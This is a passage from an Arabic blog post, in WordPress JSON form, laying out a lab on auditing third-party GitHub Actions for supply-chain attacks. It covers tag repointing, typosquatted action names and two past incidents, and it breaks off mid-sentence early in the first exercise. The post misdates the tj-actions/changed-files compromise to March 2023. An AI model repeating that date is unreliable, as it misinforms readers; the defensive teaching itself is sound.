{"id":828,"date":"2026-03-25T10:02:25","date_gmt":"2026-03-25T09:02:25","guid":{"rendered":"https:\/\/secure-pipelines.com\/uncategorized\/lab-detecting-malicious-github-actions-static-analysis\/"},"modified":"2026-03-25T10:02:25","modified_gmt":"2026-03-25T09:02:25","slug":"lab-detecting-malicious-github-actions-static-analysis","status":"publish","type":"post","link":"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/lab-detecting-malicious-github-actions-static-analysis\/","title":{"rendered":"\u0645\u062e\u062a\u0628\u0631: \u0627\u0643\u062a\u0634\u0627\u0641 GitHub Actions \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u062b\u0627\u0628\u062a"},"content":{"rendered":"<h2>\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629<\/h2>\n<p>\u062a\u064f\u0639\u062f GitHub Actions \u0645\u0646 \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u0648\u0627\u062d\u062f\u0629 \u0645\u0646 \u0623\u0643\u062b\u0631 \u0627\u0644\u0645\u064a\u0632\u0627\u062a \u0645\u0644\u0627\u0621\u0645\u0629 \u0641\u064a \u0646\u0638\u0627\u0645 GitHub. \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062a\u0648\u062c\u064a\u0647 <code>uses:<\/code> \u0648\u0627\u062d\u062f\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0633\u062a\u064a\u0631\u0627\u062f \u0645\u0646\u0637\u0642 \u0628\u0646\u0627\u0621 \u0645\u0639\u0642\u062f\u060c \u0623\u0648 \u0627\u0644\u0646\u0634\u0631 \u0639\u0644\u0649 \u0645\u0632\u0648\u062f\u064a \u0627\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0633\u062d\u0627\u0628\u064a\u0629\u060c \u0623\u0648 \u062a\u0634\u063a\u064a\u0644 \u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0641\u062d\u0635 \u0627\u0644\u0623\u0645\u0646\u064a. 
\u0644\u0643\u0646 \u0647\u0630\u0647 \u0627\u0644\u0631\u0627\u062d\u0629 \u062a\u0623\u062a\u064a \u0645\u0639 \u0645\u0642\u0627\u064a\u0636\u0629 \u062d\u0631\u062c\u0629: \u0643\u0644 action \u0645\u0646 \u0637\u0631\u0641 \u062b\u0627\u0644\u062b \u062a\u0646\u0641\u0630 \u0634\u064a\u0641\u0631\u0629 \u0628\u0631\u0645\u062c\u064a\u0629 \u0641\u064a \u0628\u064a\u0626\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643 \u0645\u0639 \u0625\u0645\u0643\u0627\u0646\u064a\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0623\u0633\u0631\u0627\u0631\u0643 \u0648\u0631\u0645\u0648\u0632\u0643 \u0627\u0644\u0645\u0645\u064a\u0632\u0629 \u0648\u0634\u064a\u0641\u0631\u062a\u0643 \u0627\u0644\u0645\u0635\u062f\u0631\u064a\u0629.<\/p>\n<p>\u064a\u0645\u0643\u0646 \u0644\u0640 action \u0645\u062e\u062a\u0631\u0642\u0629 \u0623\u0648 \u062e\u0628\u064a\u062b\u0629 \u0623\u0646 \u062a\u0633\u0631\u0651\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u060c \u0623\u0648 \u062a\u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 \u0641\u064a \u0645\u062e\u0631\u062c\u0627\u062a \u0627\u0644\u0628\u0646\u0627\u0621\u060c \u0623\u0648 \u062a\u0639\u062f\u0651\u0644 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0644\u062a\u063a\u064a\u064a\u0631 \u0627\u0644\u062e\u0637\u0648\u0627\u062a \u0627\u0644\u0644\u0627\u062d\u0642\u0629\u060c \u0623\u0648 \u062a\u0636\u0639 \u0628\u0627\u0628\u064b\u0627 \u062e\u0644\u0641\u064a\u064b\u0627 \u0641\u064a \u0625\u0635\u062f\u0627\u0631\u0627\u062a\u0643. 
\u0639\u0644\u0649 \u0639\u0643\u0633 \u0627\u0644\u062a\u0628\u0639\u064a\u0627\u062a \u0627\u0644\u0645\u064f\u062f\u0627\u0631\u0629 \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u062f\u064a\u0631\u064a \u0627\u0644\u062d\u0632\u0645\u060c \u062a\u0641\u062a\u0642\u0631 GitHub Actions \u0625\u0644\u0649 \u0646\u0638\u0627\u0645 \u062a\u062d\u0642\u0642 \u0642\u0648\u064a\u060c \u0645\u0645\u0627 \u064a\u062c\u0639\u0644\u0647\u0627 \u0647\u062f\u0641\u064b\u0627 \u0631\u0626\u064a\u0633\u064a\u064b\u0627 \u0644\u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f.<\/p>\n<p>\u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0627\u0644\u0639\u0645\u0644\u064a\u060c \u0633\u062a\u062a\u0639\u0644\u0645:<\/p>\n<ul>\n<li>\u062a\u062f\u0642\u064a\u0642 actions \u0627\u0644\u0623\u0637\u0631\u0627\u0641 \u0627\u0644\u062b\u0627\u0644\u062b\u0629 \u064a\u062f\u0648\u064a\u064b\u0627 \u0628\u062d\u062b\u064b\u0627 \u0639\u0646 \u0633\u0644\u0648\u0643 \u0645\u0634\u0628\u0648\u0647<\/li>\n<li>\u0627\u0633\u062a\u062e\u062f\u0627\u0645 <strong>actionlint<\/strong> \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u062a\u0643\u0648\u064a\u0646 \u0648\u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a<\/li>\n<li>\u0627\u0633\u062a\u062e\u062f\u0627\u0645 <strong>zizmor<\/strong> \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0636\u0627\u062f\u0629 \u0644\u0644\u0623\u0645\u0627\u0646 \u0641\u064a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/li>\n<li>\u062a\u062b\u0628\u064a\u062a actions \u0628\u0645\u0631\u0627\u062c\u0639 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u0623\u062a\u0645\u062a\u0629 \u0627\u0644\u062a\u062d\u062f\u064a\u062b\u0627\u062a 
\u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Dependabot<\/li>\n<li>\u0641\u0631\u0636 \u0642\u0627\u0626\u0645\u0629 \u0628\u064a\u0636\u0627\u0621 \u0644\u0644\u0640 actions \u0644\u0645\u0646\u0639 \u0627\u0644\u0640 actions \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u0631\u062d \u0628\u0647\u0627 \u0645\u0646 \u0627\u0644\u062f\u062e\u0648\u0644 \u0625\u0644\u0649 \u062e\u0637\u0648\u0637 \u0627\u0644\u0623\u0646\u0627\u0628\u064a\u0628 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643<\/li>\n<li>\u0645\u0631\u0627\u0642\u0628\u0629 \u062a\u063a\u064a\u064a\u0631\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 CODEOWNERS \u0648\u0641\u062d\u0648\u0635\u0627\u062a PR \u0627\u0644\u0622\u0644\u064a\u0629<\/li>\n<\/ul>\n<p>\u0628\u0646\u0647\u0627\u064a\u0629 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u0633\u064a\u0643\u0648\u0646 \u0644\u062f\u064a\u0643 \u0627\u0633\u062a\u0631\u0627\u062a\u064a\u062c\u064a\u0629 \u062f\u0641\u0627\u0639 \u0645\u062a\u0639\u062f\u062f\u0629 \u0627\u0644\u0637\u0628\u0642\u0627\u062a \u062a\u0642\u0644\u0644 \u0645\u0646 \u0645\u062e\u0627\u0637\u0631 \u0627\u062e\u062a\u0631\u0627\u0642 \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u0645\u0646 \u062e\u0644\u0627\u0644 GitHub Actions.<\/p>\n<h2>\u0627\u0644\u0645\u062a\u0637\u0644\u0628\u0627\u062a \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629<\/h2>\n<p>\u0642\u0628\u0644 \u0628\u062f\u0621 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u0648\u0641\u0631:<\/p>\n<ul>\n<li><strong>\u062d\u0633\u0627\u0628 GitHub<\/strong> \u0645\u0639 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0648\u062a\u0643\u0648\u064a\u0646 Actions<\/li>\n<li><strong>\u0645\u0633\u062a\u0648\u062f\u0639 
\u0627\u062e\u062a\u0628\u0627\u0631<\/strong> \u2014 \u0623\u0646\u0634\u0626 \u0645\u0633\u062a\u0648\u062f\u0639\u064b\u0627 \u062c\u062f\u064a\u062f\u064b\u0627 \u0623\u0648 \u0627\u0633\u062a\u062e\u062f\u0645 \u0645\u0633\u062a\u0648\u062f\u0639\u064b\u0627 \u0645\u0648\u062c\u0648\u062f\u064b\u0627 \u063a\u064a\u0631 \u0625\u0646\u062a\u0627\u062c\u064a \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 GitHub Actions \u0648\u0627\u062d\u062f \u0639\u0644\u0649 \u0627\u0644\u0623\u0642\u0644<\/li>\n<li><strong>Git CLI<\/strong> \u0645\u062b\u0628\u062a \u0648\u0645\u0635\u0627\u062f\u0642 \u0645\u0639 GitHub<\/li>\n<li><strong>Node.js 18+<\/strong> (\u0645\u0637\u0644\u0648\u0628 \u0644\u0628\u0639\u0636 \u0627\u0644\u0623\u062f\u0648\u0627\u062a)<\/li>\n<li><strong>Python 3.9+<\/strong> (\u0644\u062a\u062b\u0628\u064a\u062a zizmor)<\/li>\n<li><strong>GitHub CLI (<code>gh<\/code>)<\/strong> \u2014 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0645\u0646 <a href=\"https:\/\/cli.github.com\/\" target=\"_blank\" rel=\"noopener\">cli.github.com<\/a><\/li>\n<li><strong>\u0645\u0639\u0631\u0641\u0629 \u0623\u0633\u0627\u0633\u064a\u0629 \u0628\u0640 GitHub Actions<\/strong> \u2014 \u064a\u062c\u0628 \u0623\u0646 \u062a\u0641\u0647\u0645 \u0635\u064a\u0627\u063a\u0629 YAML \u0644\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644\u060c \u0648\u0627\u0644\u0648\u0638\u0627\u0626\u0641\u060c \u0648\u0627\u0644\u062e\u0637\u0648\u0627\u062a\u060c \u0648\u0627\u0644\u0643\u0644\u0645\u0629 \u0627\u0644\u0645\u0641\u062a\u0627\u062d\u064a\u0629 <code>uses:<\/code><\/li>\n<\/ul>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0630\u0627 \u0644\u0645 \u064a\u0643\u0646 \u0644\u062f\u064a\u0643 \u0648\u0627\u062d\u062f:<\/p>\n<pre><code>gh repo create actions-security-lab --public --clone\ncd actions-security-lab\nmkdir -p 
.github\/workflows<\/code><\/pre>\n<p>\u0623\u0646\u0634\u0626 \u0645\u0644\u0641 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0646\u0645\u0648\u0630\u062c\u064a \u0641\u064a <code>.github\/workflows\/ci.yml<\/code> \u0633\u0646\u0633\u062a\u062e\u062f\u0645\u0647 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631:<\/p>\n<pre><code>name: CI Pipeline\non:\n  push:\n    branches: [main]\n  pull_request:\n    branches: [main]\n\npermissions:\n  contents: read\n\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n      - uses: actions\/setup-node@v4\n        with:\n          node-version: '20'\n      - uses: actions\/cache@v4\n        with:\n          path: ~\/.npm\n          key: ${{ runner.os }}-npm-${{ hashFiles('**\/package-lock.json') }}\n      - run: npm ci\n      - run: npm test<\/code><\/pre>\n<h2>\u0641\u0647\u0645 \u0627\u0644\u062a\u0647\u062f\u064a\u062f<\/h2>\n<p>\u0642\u0628\u0644 \u0623\u0646 \u0646\u0628\u062f\u0623 \u0628\u0627\u0644\u0641\u062d\u0635 \u0648\u0627\u0644\u062a\u062f\u0642\u064a\u0642\u060c \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u0641\u0647\u0645 \u0643\u064a\u0641 \u062a\u0635\u0628\u062d GitHub Actions \u0646\u0648\u0627\u0642\u0644 \u0647\u062c\u0648\u0645. 
\u0647\u0646\u0627\u0643 \u0639\u062f\u0629 \u0637\u0631\u0642 \u0627\u062e\u062a\u0631\u0627\u0642 \u0645\u0648\u062b\u0642\u0629 \u062c\u064a\u062f\u064b\u0627:<\/p>\n<h3>\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u062d\u0633\u0627\u0628 \u0627\u0644\u0645\u0634\u0631\u0641<\/h3>\n<p>\u064a\u062d\u0635\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0639\u0644\u0649 \u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 GitHub \u0644\u0645\u0634\u0631\u0641 \u0627\u0644\u0640 action \u2014 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062d\u0634\u0648 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u060c \u0623\u0648 \u0627\u0644\u062a\u0635\u064a\u062f \u0627\u0644\u0627\u062d\u062a\u064a\u0627\u0644\u064a\u060c \u0623\u0648 \u0627\u062e\u062a\u0637\u0627\u0641 \u0627\u0644\u062c\u0644\u0633\u0629. \u0628\u0645\u062c\u0631\u062f \u0633\u064a\u0637\u0631\u062a\u0647 \u0639\u0644\u0649 \u0627\u0644\u062d\u0633\u0627\u0628\u060c \u064a\u062f\u0641\u0639 \u0634\u064a\u0641\u0631\u0629 \u062e\u0628\u064a\u062b\u0629 \u0625\u0644\u0649 \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0640 action \u0648\u064a\u062d\u062f\u0651\u062b \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u0645\u0648\u062c\u0648\u062f\u0629 \u0644\u0644\u0625\u0634\u0627\u0631\u0629 \u0625\u0644\u0649 \u0627\u0644\u0627\u0644\u062a\u0632\u0627\u0645 \u0627\u0644\u0645\u062e\u062a\u0631\u0642. 
\u0643\u0644 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u064a\u0634\u064a\u0631 \u0625\u0644\u0649 \u062a\u0644\u0643 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u064a\u0633\u062d\u0628 \u0627\u0644\u0646\u0633\u062e\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629 \u0641\u0648\u0631\u064b\u0627 \u0641\u064a \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0627\u0644\u064a.<\/p>\n<h3>\u062a\u062d\u062f\u064a\u062b\u0627\u062a \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u062e\u0628\u064a\u062b\u0629<\/h3>\n<p>\u0639\u0644\u0627\u0645\u0627\u062a Git \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0645\u0634\u0631\u0641 \u0627\u0644\u0640 action (\u0623\u0648 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0644\u0630\u064a \u0644\u062f\u064a\u0647 \u0635\u0644\u0627\u062d\u064a\u0629 \u0627\u0644\u062f\u0641\u0639) \u062d\u0630\u0641 \u0639\u0644\u0627\u0645\u0629 \u0645\u062b\u0644 <code>v1<\/code> \u0648\u0625\u0639\u0627\u062f\u0629 \u0625\u0646\u0634\u0627\u0626\u0647\u0627 \u0645\u0634\u064a\u0631\u0629 \u0625\u0644\u0649 \u0627\u0644\u062a\u0632\u0627\u0645 \u0645\u062e\u062a\u0644\u0641. \u0625\u0630\u0627 \u0643\u0627\u0646 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644\u0643 \u064a\u0633\u062a\u062e\u062f\u0645 <code>uses: some-action\/tool@v1<\/code>\u060c \u0641\u0623\u0646\u062a \u062a\u062b\u0642 \u0628\u0623\u0646 \u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u062a\u0634\u064a\u0631 \u062f\u0627\u0626\u0645\u064b\u0627 \u0625\u0644\u0649 \u0634\u064a\u0641\u0631\u0629 \u0622\u0645\u0646\u0629. 
\u0647\u0630\u0647 \u0627\u0644\u062b\u0642\u0629 \u064a\u0645\u0643\u0646 \u0627\u0646\u062a\u0647\u0627\u0643\u0647\u0627 \u0628\u0633\u0647\u0648\u0644\u0629.<\/p>\n<h3>\u0627\u0646\u062a\u062d\u0627\u0644 \u0627\u0644\u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u0645\u062a\u0634\u0627\u0628\u0647\u0629<\/h3>\n<p>\u064a\u0646\u0634\u0626 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 actions \u0628\u0623\u0633\u0645\u0627\u0621 \u0645\u0634\u0627\u0628\u0647\u0629 \u0628\u0634\u0643\u0644 \u0645\u0631\u0628\u0643 \u0644\u0644\u0640 actions \u0627\u0644\u0634\u0627\u0626\u0639\u0629. \u0639\u0644\u0649 \u0633\u0628\u064a\u0644 \u0627\u0644\u0645\u062b\u0627\u0644:<\/p>\n<ul>\n<li><code>actions\/checkout<\/code> (\u0634\u0631\u0639\u064a) \u0645\u0642\u0627\u0628\u0644 <code>action\/checkout<\/code> (\u0627\u0646\u062a\u062d\u0627\u0644)<\/li>\n<li><code>actions\/setup-node<\/code> \u0645\u0642\u0627\u0628\u0644 <code>actions\/setup-nodejs<\/code><\/li>\n<li><code>docker\/build-push-action<\/code> \u0645\u0642\u0627\u0628\u0644 <code>docker\/build-and-push-action<\/code><\/li>\n<\/ul>\n<p>\u062e\u0637\u0623 \u0625\u0645\u0644\u0627\u0626\u064a \u0648\u0627\u062d\u062f \u0641\u064a \u0645\u0644\u0641 YAML \u0644\u0645\u0633\u0627\u0631 \u0639\u0645\u0644\u0643 \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u0633\u062d\u0628 action \u0645\u062e\u062a\u0644\u0641\u0629 \u062a\u0645\u0627\u0645\u064b\u0627 \u0648\u062e\u0628\u064a\u062b\u0629.<\/p>\n<h3>\u0627\u062e\u062a\u0637\u0627\u0641 \u0627\u0644\u062a\u0628\u0639\u064a\u0627\u062a<\/h3>\n<p>\u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 GitHub Actions \u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 JavaScript \u0648\u0644\u062f\u064a\u0647\u0627 \u062a\u0628\u0639\u064a\u0627\u062a <code>node_modules<\/code> \u062e\u0627\u0635\u0629 \u0628\u0647\u0627. 
\u0625\u0630\u0627 \u062a\u0645 \u0627\u062e\u062a\u0631\u0627\u0642 \u0625\u062d\u062f\u0649 \u062a\u0628\u0639\u064a\u0627\u062a \u0627\u0644\u0640 action (\u0639\u0628\u0631 \u0647\u062c\u0648\u0645 \u0633\u0644\u0633\u0644\u0629 \u062a\u0648\u0631\u064a\u062f npm)\u060c \u062a\u0635\u0628\u062d \u0627\u0644\u0640 action \u0646\u0641\u0633\u0647\u0627 \u0646\u0627\u0642\u0644 \u0647\u062c\u0648\u0645 \u2014 \u062d\u062a\u0649 \u0644\u0648 \u0643\u0627\u0646\u062a \u0634\u064a\u0641\u0631\u0629 \u0627\u0644\u0640 action \u0646\u0641\u0633\u0647\u0627 \u0646\u0638\u064a\u0641\u0629.<\/p>\n<h3>\u062d\u0648\u0627\u062f\u062b \u0648\u0627\u0642\u0639\u064a\u0629<\/h3>\n<p><strong>tj-actions\/changed-files (\u0645\u0627\u0631\u0633 2023):<\/strong> \u0627\u062e\u062a\u0631\u0642 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u0648\u0646 \u0627\u0644\u0640 action \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0629 \u0639\u0644\u0649 \u0646\u0637\u0627\u0642 \u0648\u0627\u0633\u0639 <code>tj-actions\/changed-files<\/code> \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u062d\u0633\u0627\u0628 \u0627\u0644\u0645\u0634\u0631\u0641. \u0639\u062f\u0651\u0644\u0648\u0627 \u0627\u0644\u0640 action \u0644\u062a\u0633\u0631\u064a\u0628 \u0623\u0633\u0631\u0627\u0631 CI\/CD \u0639\u0646 \u0637\u0631\u064a\u0642 \u062a\u0641\u0631\u064a\u063a \u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0645\u064f\u0634\u063a\u0651\u0644 \u0648\u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0641\u064a \u0633\u062c\u0644\u0627\u062a \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644. 
\u062a\u0623\u062b\u0631\u062a \u0622\u0644\u0627\u0641 \u0627\u0644\u0645\u0633\u062a\u0648\u062f\u0639\u0627\u062a \u0644\u0623\u0646\u0647\u0627 \u0623\u0634\u0627\u0631\u062a \u0625\u0644\u0649 \u0639\u0644\u0627\u0645\u0627\u062a \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 SHA \u0645\u062b\u0628\u062a\u0629.<\/p>\n<p><strong>codecov\/codecov-action (2021):<\/strong> \u062a\u0645 \u062a\u0639\u062f\u064a\u0644 Codecov Bash Uploader \u0628\u0648\u0627\u0633\u0637\u0629 \u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062d\u0635\u0644\u0648\u0627 \u0639\u0644\u0649 \u0627\u0644\u0648\u0635\u0648\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0635\u0648\u0631\u0629 Docker \u0645\u062e\u062a\u0631\u0642\u0629 \u0645\u0633\u062a\u062e\u062f\u0645\u0629 \u0641\u064a \u0639\u0645\u0644\u064a\u0629 CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Codecov. \u0642\u0627\u0645 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u0627\u0644\u0645\u0639\u062f\u0651\u0644 \u0628\u062a\u0633\u0631\u064a\u0628 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u2014 \u0628\u0645\u0627 \u0641\u064a \u0630\u0644\u0643 \u0631\u0645\u0648\u0632 CI \u0648\u0645\u0641\u0627\u062a\u064a\u062d API \u0648\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u2014 \u0645\u0646 \u0628\u064a\u0626\u0627\u062a CI \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u0639\u0645\u0644\u0627\u0621. 
\u0623\u062b\u0631 \u0647\u0630\u0627 \u0639\u0644\u0649 \u0639\u062f\u062f \u0643\u0628\u064a\u0631 \u0645\u0646 \u0627\u0644\u0645\u0646\u0638\u0645\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0634\u063a\u0644 action \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 Codecov \u0641\u064a \u062e\u0637\u0648\u0637 \u0623\u0646\u0627\u0628\u064a\u0628\u0647\u0627.<\/p>\n<p>\u062a\u0634\u062a\u0631\u0643 \u0647\u0630\u0647 \u0627\u0644\u062d\u0648\u0627\u062f\u062b \u0641\u064a \u0646\u0645\u0637 \u0645\u0634\u062a\u0631\u0643: <strong>\u0627\u0644\u062b\u0642\u0629 \u0641\u064a \u0627\u0644\u0645\u0631\u0627\u062c\u0639 \u0627\u0644\u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631<\/strong>. \u0643\u0627\u0646 \u064a\u0645\u0643\u0646 \u062a\u062e\u0641\u064a\u0641 \u0643\u0644\u062a\u0627 \u0627\u0644\u062d\u0627\u062f\u062b\u062a\u064a\u0646 \u0639\u0646 \u0637\u0631\u064a\u0642 \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0628\u0640 SHA \u063a\u064a\u0631 \u0642\u0627\u0628\u0644\u0629 \u0644\u0644\u062a\u063a\u064a\u064a\u0631 \u0648\u062a\u062f\u0642\u064a\u0642 \u0633\u0644\u0648\u0643 \u0627\u0644\u0640 action \u0642\u0628\u0644 \u0627\u0639\u062a\u0645\u0627\u062f\u0647\u0627.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 1: \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u0627\u0644\u064a\u062f\u0648\u064a \u0644\u0644\u0640 Actions<\/h2>\n<p>\u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0627\u0644\u0622\u0644\u064a\u0629 \u0636\u0631\u0648\u0631\u064a\u0629\u060c \u0644\u0643\u0646 \u0644\u0627 \u0628\u062f\u064a\u0644 \u0639\u0646 \u0641\u0647\u0645 \u0645\u0627 \u062a\u0641\u0639\u0644\u0647 \u0627\u0644\u0640 action \u0641\u0639\u0644\u0627\u064b. 
\u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u062a\u0645\u0631\u064a\u0646\u060c \u0633\u062a\u0642\u0648\u0645 \u0628\u062a\u062f\u0642\u064a\u0642 \u062b\u0644\u0627\u062b actions \u0634\u0627\u0626\u0639\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u064a\u062f\u0648\u064a\u064b\u0627 \u0644\u0628\u0646\u0627\u0621 \u062d\u062f\u0633\u0643 \u0641\u064a \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0634\u0628\u0648\u0647\u0629.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0627\u062e\u062a\u064a\u0627\u0631 \u0627\u0644\u0640 Actions \u0644\u0644\u062a\u062f\u0642\u064a\u0642<\/h3>\n<p>\u0645\u0646 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0623\u0639\u0644\u0627\u0647\u060c \u0633\u0646\u0642\u0648\u0645 \u0628\u062a\u062f\u0642\u064a\u0642:<\/p>\n<ol>\n<li><code>actions\/checkout@v4<\/code><\/li>\n<li><code>actions\/setup-node@v4<\/code><\/li>\n<li><code>actions\/cache@v4<\/code><\/li>\n<\/ol>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0645\u0631\u0627\u062c\u0639\u0629 <code>action.yml<\/code><\/h3>\n<p>\u0644\u0643\u0644 action\u060c \u0627\u0628\u062f\u0623 \u0628\u0641\u062d\u0635 \u0645\u0644\u0641 <code>action.yml<\/code> \u0641\u064a \u0645\u0633\u062a\u0648\u062f\u0639 \u0627\u0644\u0640 action. 
\u064a\u062d\u062f\u062f \u0647\u0630\u0627 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a \u0648\u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a \u0648\u0646\u0642\u0637\u0629 \u0627\u0644\u062f\u062e\u0648\u0644 \u0644\u0644\u0640 action.<\/p>\n<pre><code># \u0627\u0633\u062a\u0646\u0633\u0627\u062e \u0627\u0644\u0640 action \u0644\u0644\u0641\u062d\u0635 \u0645\u062d\u0644\u064a\u064b\u0627\ngit clone --depth 1 https:\/\/github.com\/actions\/checkout.git \/tmp\/audit-checkout\ncat \/tmp\/audit-checkout\/action.yml<\/code><\/pre>\n<p>\u0627\u0644\u0623\u0634\u064a\u0627\u0621 \u0627\u0644\u0631\u0626\u064a\u0633\u064a\u0629 \u0627\u0644\u062a\u064a \u064a\u062c\u0628 \u0627\u0644\u0628\u062d\u062b \u0639\u0646\u0647\u0627 \u0641\u064a <code>action.yml<\/code>:<\/p>\n<ul>\n<li><strong>\u0646\u0642\u0637\u0629 \u0627\u0644\u062f\u062e\u0648\u0644:<\/strong> \u0647\u0644 \u0647\u064a action \u0645\u0646 \u0646\u0648\u0639 <code>node<\/code> (\u062a\u0634\u063a\u0644 JavaScript)\u060c \u0623\u0648 <code>composite<\/code> (\u062a\u0634\u063a\u0644 